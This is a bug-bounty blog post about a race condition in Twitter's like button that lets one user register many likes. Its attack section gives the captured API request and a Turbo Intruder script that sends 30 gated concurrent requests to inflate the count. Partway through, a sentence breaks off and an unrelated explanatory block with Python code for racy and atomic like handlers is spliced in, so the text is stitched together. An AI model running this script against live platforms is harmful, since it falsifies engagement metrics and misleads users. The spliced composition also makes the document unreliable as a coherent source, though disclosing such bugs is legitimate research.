Hacking the Like Functionality of Twitter!
2023-4-6 12:41:46 Author: infosecwriteups.com (view original)

Credit: Muhammed Anzil

Hey InfoSec community,

Twitter is a social media platform used by millions of people around the world to share their thoughts, opinions, and experiences. One of its most popular features is the ability to “like” a tweet, which indicates approval or agreement with its content. Recent findings have uncovered a race condition bug in Twitter’s like functionality that allows more likes to be registered than intended. In this blog, we will dive deeper into this bug to examine how a race condition was exploited to obtain more likes than intended. This case highlights the need for developers and security researchers to be aware of the potential for race conditions and to take appropriate measures to prevent and mitigate them.

Warning:

Please note that the purpose of this blog is to share information about the race condition bug in Twitter’s like functionality. It is important to emphasize that exploiting this bug for any malicious purposes is strictly prohibited and can have serious consequences.

I strongly advise my readers to use this information for educational and research purposes only and to refrain from engaging in any actions that could harm individuals or organizations.

Thank you for your understanding and responsible use of this information.

What is Race Condition?

Race conditions are a common class of software vulnerability that can have serious consequences. They arise when multiple processes or threads access a shared resource simultaneously and the outcome depends on the order in which those processes or threads execute. In recent years, race conditions have been used to exploit systems in several ways. In this blog post, we will explore the importance of race conditions in the context of a specific case — Twitter’s Like Functionality.

Read more about Race Condition: Click Here

Story Begins

As an avid Twitter user, I frequently engage in both posting and reading content on the platform. Today, I noticed an unusually high number of likes on one of my posts and, upon investigating, I was unable to identify their origin. Around that time I received a message from a community member, Muhammed Anzil, who informed me that he had exploited the race condition bug in order to generate those additional likes. He was able to send multiple requests to the server within a short period of time, taking advantage of the race condition to artificially increase the number of likes on a tweet. While this may seem like a harmless prank, it is important to note that exploiting this bug can have serious consequences, including misleading analytics and potentially damaging the reputation of individuals or promoting malicious content.

Inner Workings of a Race Condition Bug

1. Intercept the request while clicking the Like button.
2. Capture the request and send it to Burp’s Turbo Intruder:

POST /i/api/graphql/lI07N6Otwv1PhnEgXILM7A/FavoriteTweet HTTP/2
Host: twitter.com
Cookie: guest_id_marketing=REDACTED; guest_id_ads=REDACTED; personalization_id="REDACTED"; guest_id=REDACTED; ct0=REDACTED; _ga=REDACTED; kdt=REDACTED; twid=REDACTED; auth_token=REDACTED; dnt=1; external_referer=REDACTED; _gid=REDACTED; lang=en
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 83
Referer: https://twitter.com/home
X-Twitter-Auth-Type: OAuth2Session
X-Csrf-Token: REDACTED
X-Twitter-Client-Language: en
X-Twitter-Active-User: yes
Origin: https://twitter.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Sec-Gpc: 1
Authorization: Bearer REDACTED
Te: trailers

{"variables":{"tweet_id":"REDACTED"},"queryId":"REDACTED"}

3. Use the following Turbo Intruder script (Race.py):

# Turbo Intruder script: RequestEngine and table are provided by the extension
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    for i in range(30):
        engine.queue(target.req, target.baseInput, gate='race1')

    # wait until every 'race1' tagged request is ready,
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    # show every response in the results table
    table.add(req)

4. Place Turbo Intruder’s %s insertion point after the User-Agent header, then start the attack.

5. Done!

Result: 30+ Likes instead of one!!

Likewise, it’s possible to increment the count
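The shape of bug the write-up describes is a check-then-act window: the handler checks whether the user already liked the tweet, then writes, and concurrent requests all pass the check before any write lands. The following is an added illustration, not Twitter’s code (its internals are not public); the `RacyLikes`/`AtomicLikes` handlers, the user and tweet ids, and the barrier used to force the interleaving are all constructed for the example.

```python
"""Race-prone 'like' handler beside an atomic one, hit by 30 concurrent requests."""
import threading


class RacyLikes:
    """Check-then-act: the check and the write are separate, unsynchronised steps."""

    def __init__(self):
        self.liked_by = {}  # tweet_id -> list of user_ids (one row per like)

    def like(self, user, tweet, between_check_and_act=lambda: None):
        if user in self.liked_by.setdefault(tweet, []):  # 1. check
            return False
        between_check_and_act()  # window in which other requests also pass the check
        self.liked_by[tweet].append(user)  # 2. act
        return True


class AtomicLikes:
    """Check and act under one lock; the count is derived from a set, never a counter.

    In a database the equivalent is a UNIQUE(user_id, tweet_id) constraint with an
    insert that ignores duplicates, so the storage layer enforces one like per user.
    """

    def __init__(self):
        self._lock = threading.Lock()
        self.liked_by = {}  # tweet_id -> set of user_ids

    def like(self, user, tweet):
        with self._lock:
            users = self.liked_by.setdefault(tweet, set())
            if user in users:
                return False
            users.add(user)
            return True

    def like_count(self, tweet):
        return len(self.liked_by.get(tweet, ()))


def fire_concurrent(n, request):
    """Run request(release) on n threads; release() blocks until all n reach it."""
    barrier = threading.Barrier(n)
    threads = [threading.Thread(target=request, args=(barrier.wait,)) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


def racy_count(n=30):
    """Every request checks first, then all write: n likes from one user (30 here)."""
    svc = RacyLikes()
    fire_concurrent(n, lambda release: svc.like("alice", "tweet-1", release))
    return len(svc.liked_by["tweet-1"])


def atomic_count(n=30):
    """Same burst against the locked handler: exactly one like survives."""
    svc = AtomicLikes()

    def request(release):
        release()  # all n requests start at the same instant
        svc.like("alice", "tweet-1")

    fire_concurrent(n, request)
    return svc.like_count("tweet-1")
```

The barrier makes the racy interleaving deterministic for the demonstration; in production the window is only the few milliseconds between the check and the write, which is exactly what sending the final byte of every request at once (the gate technique above) is designed to hit.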

Despite his efforts, it appears that the report was not given due consideration by the relevant parties. They said:

This behaviour is already known to Twitter and is not considered to be a security vulnerability.

Although the stats reflected by the website may be influenced for a while, this does not impact the confidentiality, integrity, or availability of the application. In addition, these manipulated statistics do not influence the ranking of the Tweet in Twitter's algorithms, preventing an attacker from using this behaviour in an attempt to have their Tweet displayed more favourably to other users. For this reason, we will close this report as informative.

In addition, please note that resubmitting the same behaviour that was previously closed may result in your future submissions being closed as "Not Applicable"

As we wrap up our discussion on the race condition bug in Twitter’s like functionality, we must ask ourselves: is this issue truly valid? While some may argue that this bug is a minor flaw without any significant impact, others may see it as a serious concern, since unintended likes should not be possible at all.

I encourage my readers to share thoughts and opinions on this matter.

Do you believe that the race condition bug in Twitter’s like functionality is a valid issue that should be addressed? Or do you think it is being blown out of proportion?

I invite you to share your valuable insights and perspectives on this topic. Your contribution will enrich the ongoing discussion on this issue. Thank you for your engagement, and I look forward to connecting with you on social media. Click here to connect with me → 7h3h4ckv157


Source: https://infosecwriteups.com/hacking-the-like-functionality-of-twitter-3a5730687097?source=rss----7b722bfd1b8d--bug_bounty